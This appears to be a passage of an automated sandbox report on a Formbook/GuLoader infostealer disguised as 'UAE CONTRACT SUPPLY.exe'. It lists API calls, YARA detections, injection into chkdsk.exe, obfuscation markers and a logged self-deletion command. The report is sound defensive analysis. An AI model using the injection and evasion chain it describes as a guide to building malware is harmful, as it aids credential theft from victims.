Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E50A3B0 NtGetContextThread,		3_2_1E50A3B0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E50B040 NtSuspendThread,		3_2_1E50B040
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509820 NtEnumerateKey,		3_2_1E509820
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5098A0 NtWriteVirtualMemory,		3_2_1E5098A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509950 NtQueueApcThread,		3_2_1E509950
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5099D0 NtCreateProcessEx,		3_2_1E5099D0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_00565DCB NtProtectVirtualMemory,		3_2_00565DCB
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_00566266 NtQueryInformationProcess,		3_2_00566266
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_00566455 NtQueryInformationProcess,		3_2_00566455
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_0056641E NtQueryInformationProcess,		3_2_0056641E
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_005664FB NtQueryInformationProcess,		3_2_005664FB
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_005664A4 NtQueryInformationProcess,		3_2_005664A4
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_00566566 NtQueryInformationProcess,		3_2_00566566
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_0056626E NtQueryInformationProcess,		3_2_0056626E
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_00566629 NtQueryInformationProcess,		3_2_00566629
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_005662C5 NtQueryInformationProcess,		3_2_005662C5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_005662EA NtQueryInformationProcess,		3_2_005662EA
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_0056629C NtQueryInformationProcess,		3_2_0056629C
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_00566335 NtQueryInformationProcess,		3_2_00566335
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_005663F8 NtQueryInformationProcess,		3_2_005663F8
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_005663A0 NtQueryInformationProcess,		3_2_005663A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_005663AA NtQueryInformationProcess,		3_2_005663AA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9540 NtReadFile,LdrInitializeThunk,		16_2_056F9540
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F95D0 NtClose,LdrInitializeThunk,		16_2_056F95D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9710 NtQueryInformationToken,LdrInitializeThunk,		16_2_056F9710
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9FE0 NtCreateMutant,LdrInitializeThunk,		16_2_056F9FE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9780 NtMapViewOfSection,LdrInitializeThunk,		16_2_056F9780
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9660 NtAllocateVirtualMemory,LdrInitializeThunk,		16_2_056F9660
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9650 NtQueryValueKey,LdrInitializeThunk,		16_2_056F9650
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F96E0 NtFreeVirtualMemory,LdrInitializeThunk,		16_2_056F96E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F96D0 NtCreateKey,LdrInitializeThunk,		16_2_056F96D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,		16_2_056F9910
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F99A0 NtCreateSection,LdrInitializeThunk,		16_2_056F99A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9860 NtQuerySystemInformation,LdrInitializeThunk,		16_2_056F9860
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9840 NtDelayExecution,LdrInitializeThunk,		16_2_056F9840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9A50 NtCreateFile,LdrInitializeThunk,		16_2_056F9A50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9560 NtWriteFile,		16_2_056F9560
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9520 NtWaitForSingleObject,		16_2_056F9520
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056FAD30 NtSetContextThread,		16_2_056FAD30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F95F0 NtQueryInformationFile,		16_2_056F95F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9760 NtOpenProcess,		16_2_056F9760
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056FA770 NtOpenThread,		16_2_056FA770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9770 NtSetInformationFile,		16_2_056F9770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9730 NtQueryVirtualMemory,		16_2_056F9730
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056FA710 NtOpenProcessToken,		16_2_056FA710
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F97A0 NtUnmapViewOfSection,		16_2_056F97A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9670 NtQueryInformationProcess,		16_2_056F9670
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9610 NtEnumerateValueKey,		16_2_056F9610
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9950 NtQueueApcThread,		16_2_056F9950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F99D0 NtCreateProcessEx,		16_2_056F99D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056FB040 NtSuspendThread,		16_2_056FB040
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9820 NtEnumerateKey,		16_2_056F9820
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F98F0 NtReadVirtualMemory,		16_2_056F98F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F98A0 NtWriteVirtualMemory,		16_2_056F98A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9B00 NtSetValueKey,		16_2_056F9B00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056FA3B0 NtGetContextThread,		16_2_056FA3B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9A20 NtResumeThread,		16_2_056F9A20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9A00 NtProtectVirtualMemory,		16_2_056F9A00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9A10 NtQuerySection,		16_2_056F9A10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F9A80 NtOpenDirectoryObject,		16_2_056F9A80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CF81B0 NtCreateFile,		16_2_00CF81B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CF82E0 NtClose,		16_2_00CF82E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CF8260 NtReadFile,		16_2_00CF8260
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CF8390 NtAllocateVirtualMemory,		16_2_00CF8390
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CF82DA NtClose,		16_2_00CF82DA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CF825A NtReadFile,		16_2_00CF825A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CF838A NtAllocateVirtualMemory,		16_2_00CF838A

Detected potential crypto function

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_00401348		1_2_00401348
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0040139A		1_2_0040139A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58D616		3_2_1E58D616
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4E6E30		3_2_1E4E6E30
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E592EF7		3_2_1E592EF7
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E591FF1		3_2_1E591FF1
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58D466		3_2_1E58D466
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D841F		3_2_1E4D841F
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E591D55		3_2_1E591D55
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E592D07		3_2_1E592D07
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C0D20		3_2_1E4C0D20
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5925DD		3_2_1E5925DD
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4DD5E0		3_2_1E4DD5E0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F2581		3_2_1E4F2581
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5922AE		3_2_1E5922AE
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E592B28		3_2_1E592B28
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58DBD2		3_2_1E58DBD2
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FEBB0		3_2_1E4FEBB0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581002		3_2_1E581002
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5928EC		3_2_1E5928EC
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4DB090		3_2_1E4DB090
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F20A0		3_2_1E4F20A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5920A8		3_2_1E5920A8
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CF900		3_2_1E4CF900
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4E4120		3_2_1E4E4120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05781D55		16_2_05781D55
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B0D20		16_2_056B0D20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05782D07		16_2_05782D07
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056CD5E0		16_2_056CD5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057825DD		16_2_057825DD
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E2581		16_2_056E2581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0577D466		16_2_0577D466
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C841F		16_2_056C841F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05781FF1		16_2_05781FF1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0578DFCE		16_2_0578DFCE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056D6E30		16_2_056D6E30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0577D616		16_2_0577D616
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05782EF7		16_2_05782EF7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056D4120		16_2_056D4120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056BF900		16_2_056BF900
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0578E824		16_2_0578E824
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DA830		16_2_056DA830
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771002		16_2_05771002
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057828EC		16_2_057828EC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E20A0		16_2_056E20A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057820A8		16_2_057820A8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056CB090		16_2_056CB090
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DAB40		16_2_056DAB40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05782B28		16_2_05782B28
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0577DBD2		16_2_0577DBD2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057703DA		16_2_057703DA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EEBB0		16_2_056EEBB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0576FA2B		16_2_0576FA2B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057822AE		16_2_057822AE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CFC878		16_2_00CFC878
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CFCBE6		16_2_00CFCBE6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CFCBE3		16_2_00CFCBE3
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CE8C50		16_2_00CE8C50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CE8C0A		16_2_00CE8C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CE2D90		16_2_00CE2D90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CFB5BB		16_2_00CFB5BB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CE2FB0		16_2_00CE2FB0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 056BB150 appears 54 times
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: String function: 1E4CB150 appears 35 times

PE file contains strange resources

Source: UAE CONTRACT SUPPLY.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.390017315.0000000002C30000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameVrdihftetgo6.exeFE2XTred6 vs UAE CONTRACT SUPPLY.exe
Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameVrdihftetgo6.exe vs UAE CONTRACT SUPPLY.exe
Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389503842.0000000002230000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs UAE CONTRACT SUPPLY.exe
Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514676013.00000000000B6000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs UAE CONTRACT SUPPLY.exe
Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs UAE CONTRACT SUPPLY.exe
Source: UAE CONTRACT SUPPLY.exe, 00000003.00000000.388321692.0000000000416000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameVrdihftetgo6.exe vs UAE CONTRACT SUPPLY.exe
Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519498317.000000001DED0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs UAE CONTRACT SUPPLY.exe
Source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.515245595.0000000002460000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs UAE CONTRACT SUPPLY.exe
Source: UAE CONTRACT SUPPLY.exe	Binary or memory string: OriginalFilenameVrdihftetgo6.exe vs UAE CONTRACT SUPPLY.exe

Uses 32bit PE files

Source: UAE CONTRACT SUPPLY.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Yara signature match

Source: 00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.631687849.0000000000FD4000.00000004.00000020.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Classification label

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/0@10/4

Creates mutexes

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1068:120:WilError_01

Creates temporary files

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe

File created: C:\Users\user\AppData\Local\Temp\~DF36513EDB16C1AC61.TMP

Jump to behavior

PE file has an executable .text section and no other executable section

Source: UAE CONTRACT SUPPLY.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Reads software policies

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: UAE CONTRACT SUPPLY.exe	Virustotal: Detection: 33%
Source: UAE CONTRACT SUPPLY.exe	ReversingLabs: Detection: 36%

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
Source: unknown	Process created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: unknown	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Process created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: chkdsk.pdbGCTL source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp
Source:	Binary string: chkdsk.pdb source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: UAE CONTRACT SUPPLY.exe, chkdsk.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Source: Yara match	File source: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6848, type: MEMORY
Source: Yara match	File source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6952, type: MEMORY

Yara detected VB6 Downloader Generic

Source: Yara match	File source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6848, type: MEMORY
Source: Yara match	File source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6952, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_00409C7D push ss; retf		1_2_00409C7E
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0040B823 pushfd ; retf		1_2_0040B83A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_00409D6C push ebx; retf		1_2_00409D06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_00409D7E push ss; retf		1_2_00409F0A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_00409E5B push ss; retf		1_2_00409F0A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_00407341 push ebx; retf		1_2_00407342
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_00409F49 push ss; retf		1_2_00409F0A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0040A765 push 00000062h; retf		1_2_0040A767
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0040B370 push eax; ret		1_2_0040B371
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0226005D push FFFFFFB9h; retf		1_2_02260068
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02260130 push FFFFFFB9h; retf		1_2_02260141
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E51D0D1 push ecx; ret		3_2_1E51D0E4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0570D0D1 push ecx; ret		16_2_0570D0E4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CF519C push esi; iretd		16_2_00CF51A2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CE6108 push cs; iretd		16_2_00CE610F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CFCA50 push 0000005Ah; ret		16_2_00CFCA52
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CFB3FB push eax; ret		16_2_00CFB462
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CFB3F2 push eax; ret		16_2_00CFB3F8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CFB3A5 push eax; ret		16_2_00CFB3F8
